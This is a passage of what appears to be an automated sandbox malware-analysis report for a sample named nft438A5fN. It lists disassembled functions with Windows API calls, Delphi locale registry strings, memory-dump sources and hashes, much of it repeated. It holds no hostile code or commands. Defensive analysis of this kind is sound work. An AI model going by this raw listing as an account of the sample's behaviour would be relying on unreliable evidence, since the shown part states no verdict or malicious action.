                                                                      • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02C96C14,02C90000,02CBE790), ref: 02C95A19
                                                                      • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C96C14,02C90000,02CBE790), ref: 02C95A2B
                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C96C14,02C90000,02CBE790), ref: 02C95A37
                                                                      • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C96C14,02C90000), ref: 02C95A6B
                                                                      • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C96C14), ref: 02C95A77
                                                                      • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02C95A99
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                      • String ID: GetLongPathNameA$\$kernel32.dll
                                                                      • API String ID: 3245196872-1565342463
                                                                      • Opcode ID: d1802694444543a35e46fdf328a76334b156935a7561f50df8da71d6b2515a03
                                                                      • Instruction ID: cf7f3b7e8c59be1e5f31e482a7ea5fea714849ee076658a73ee60e96f724b5ce
                                                                      • Opcode Fuzzy Hash: d1802694444543a35e46fdf328a76334b156935a7561f50df8da71d6b2515a03
                                                                      • Instruction Fuzzy Hash: EC419E71E4061AAFDF11EAE8CC8CAEEB3BDAF48390F5405A5A148E7201E7709B44CF54
                                                                      Function 02C95BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C95BE8
                                                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C95BF5
                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C95BFB
                                                                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C95C26
                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C95C6D
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C95C7D
                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C95CA5
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C95CB5
                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C95CDB
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C95CEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                      • API String ID: 1599918012-2375825460
                                                                      • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                      • Instruction ID: 7d13747fe567b1f3afcc1dd3b4ae9165bc026d857be380ffab8f08412d62a2e3
                                                                      • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                      • Instruction Fuzzy Hash: C6319571E4066D6AEF26DAB48C4EFDE77AD9B443C0F8401A19A08E6181D6B49B84CF50
                                                                      Function 02D5D800 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dcb224859250cd723320a065f1804b0e82770bf61cc8bf650626b273fdae68a5
                                                                      • Instruction ID: 6cee2a2f1158c54f1eaab45277ff25968a42ec45b631c497e0c416f3e1b5b57e
                                                                      • Opcode Fuzzy Hash: dcb224859250cd723320a065f1804b0e82770bf61cc8bf650626b273fdae68a5
                                                                      • Instruction Fuzzy Hash: 0A021C71E042299FDF14CFA9C8806AEBBF2EF88314F15816AD819E7344D771AE41CB94
                                                                      Function 02D6B769 Relevance: 2.9, APIs: 1, Instructions: 1381COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      • String ID:
                                                                      • API String ID: 4168288129-0
                                                                      • Opcode ID: ed5127cdc400e90a0cd04182132ef1189bad1dc249964083a3aeb657203f5d4f
                                                                      • Instruction ID: b3b7bb01bc27a86e6dcefd37ed39683a27c2fa4d55071faa55776566bd46fd24
                                                                      • Opcode Fuzzy Hash: ed5127cdc400e90a0cd04182132ef1189bad1dc249964083a3aeb657203f5d4f
                                                                      • Instruction Fuzzy Hash: 4DC21771E186288FDB25DE289D487A9B7B5EB48309F1441EBD88DE7340E775AE81CF40
                                                                      Function 02D4AF67 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                      • Instruction ID: d138ebfe8f71394729f792d6b1e0523f0bbb5c5ad9642d76714df69769c20187
                                                                      • Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                                                      • Instruction Fuzzy Hash: 9F125B327483108BD714DF69C891A1FB3E2BFC8754F158D2DE4A9AB380DA74EC558B92
                                                                      Function 02D3E9BE Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PkGNG
                                                                      • API String ID: 0-263838557
                                                                      • Opcode ID: cd36fe8c387ca2855096d15b7bf2cfed8e34aa58cb0db234df7a19e6c716ea84
                                                                      • Instruction ID: e63918e968c58970a573a92add572ad8592a6fd27e509687731e6f325db61251
                                                                      • Opcode Fuzzy Hash: cd36fe8c387ca2855096d15b7bf2cfed8e34aa58cb0db234df7a19e6c716ea84
                                                                      • Instruction Fuzzy Hash: EE02ACB16046518BC358CF2EEC9063AB7E1AB8D311B44863EE495C7781EB75E922CB94
                                                                      Function 02D3E42F Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PkGNG
                                                                      • API String ID: 0-263838557
                                                                      • Opcode ID: 88b47d59bd8f9e39717b2a9a8c0dcea2e64fabbb26349240269cb2a589f8870d
                                                                      • Instruction ID: 4429f88121793219acf3a8786f5a51dc5cd39d693f93e2d83177a20e80e1bec0
                                                                      • Opcode Fuzzy Hash: 88b47d59bd8f9e39717b2a9a8c0dcea2e64fabbb26349240269cb2a589f8870d
                                                                      • Instruction Fuzzy Hash: 4CF17C756142548FC348CF1DE8A087BB3E5FB89311B440A2EF582C7391DB75EA16CB66
                                                                      Function 02C97FD2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02C97FF5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1705453755-0
                                                                      • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                      • Instruction ID: f5dc05d171a5afb494a09d4818163010e73222e059bb9be98a30ef1d6cd8dba8
                                                                      • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                      • Instruction Fuzzy Hash: 9E11D2B5E00209AF9B04CF99C881DBFF7F9FFC8300B54C569A509E7254E6719E018B90
                                                                      Function 02C9A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C9A7E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                      • Instruction ID: a5a00b3ad1b1d3fac1b5e59262f478de2f334e0a9c62d7a79f3845242e0989fd
                                                                      • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                      • Instruction Fuzzy Hash: C1E0D87170021857DB15A5999C89EFA725D9B5C310F00427ABD05C7385EDF19E804AE8
                                                                      Function 02D35183 Relevance: 1.5, Strings: 1, Instructions: 277COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: PkGNG
                                                                      • API String ID: 0-263838557
                                                                      • Opcode ID: a138c4e0aeabb2bccdb66877e2b9435159f75a40726a9d3314504188017a6109
                                                                      • Instruction ID: 34c08f88578722725a410210327bab2a0febd45ba904af31008a545f09562c56
                                                                      • Opcode Fuzzy Hash: a138c4e0aeabb2bccdb66877e2b9435159f75a40726a9d3314504188017a6109
                                                                      • Instruction Fuzzy Hash: 57B1833911429A8ACB06EF68C4913F637A1EF6A300F4851B9EC9CCF756D3358906EB74
                                                                      Function 02C9B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetVersionExA.KERNEL32(?,02CBD106,00000000,02CBD11E), ref: 02C9B79A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Version
                                                                      • String ID:
                                                                      • API String ID: 1889659487-0
                                                                      • Opcode ID: d70ef78b7f823bd151896926fefed92e6b1264d95701ca0589ae8b8f4c67619b
                                                                      • Instruction ID: 71184f86b8606b6bac7d28c1b5f185111c618c230e14f7018760250294ae260a
                                                                      • Opcode Fuzzy Hash: d70ef78b7f823bd151896926fefed92e6b1264d95701ca0589ae8b8f4c67619b
                                                                      • Instruction Fuzzy Hash: F4F03AB4904301AFD751DF28E44475577E9FB88B04F818E28E699D7B80E7399814CF62
                                                                      Function 02C9A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02C9BE72,00000000,02C9C08B,?,?,00000000,00000000), ref: 02C9A823
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID:
                                                                      • API String ID: 2299586839-0
                                                                      • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                      • Instruction ID: 60707f0edf806ad51fac04688bb5ece4106f0e462793faf24770e0bca300beb6
                                                                      • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                      • Instruction Fuzzy Hash: BBD05EB230E2602AAA10925B2D88D7B5AECCFC57A1F10403AF988C6141D6108C07DAB5
                                                                      Function 02C9920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LocalTime
                                                                      • String ID:
                                                                      • API String ID: 481472006-0
                                                                      • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                      • Instruction ID: 12a549942f90666c3f00c3f52a97a4d4b4a13f2810077b42fe959e74a46d8d1c
                                                                      • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                      • Instruction Fuzzy Hash: 7FA0125040482081894033180C0253430445910A20FD4874068F8402D0E92D01209093
                                                                      Function 02D556AC Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                      • Instruction ID: 6ba16d782d0234069ed0c2362209dd3523083aa74a3fb0a324a510a5cca1f3ee
                                                                      • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                      • Instruction Fuzzy Hash: 5E513525A007B4D7DF378568A5557BE2BCA9F01208FD80A19CC82CB791D7C9DE45CB62
                                                                      Function 02D5547D Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                      • Instruction ID: 58126480b2f926843e2622111efb88b208e12bdae38303aadb6be735dad59746
                                                                      • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                      • Instruction Fuzzy Hash: 7B5152A16046B497DF378D68B4547BE23CBDB42208FC80919DC869BB81D7D5EE41C7A2
                                                                      Function 02D4C246 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
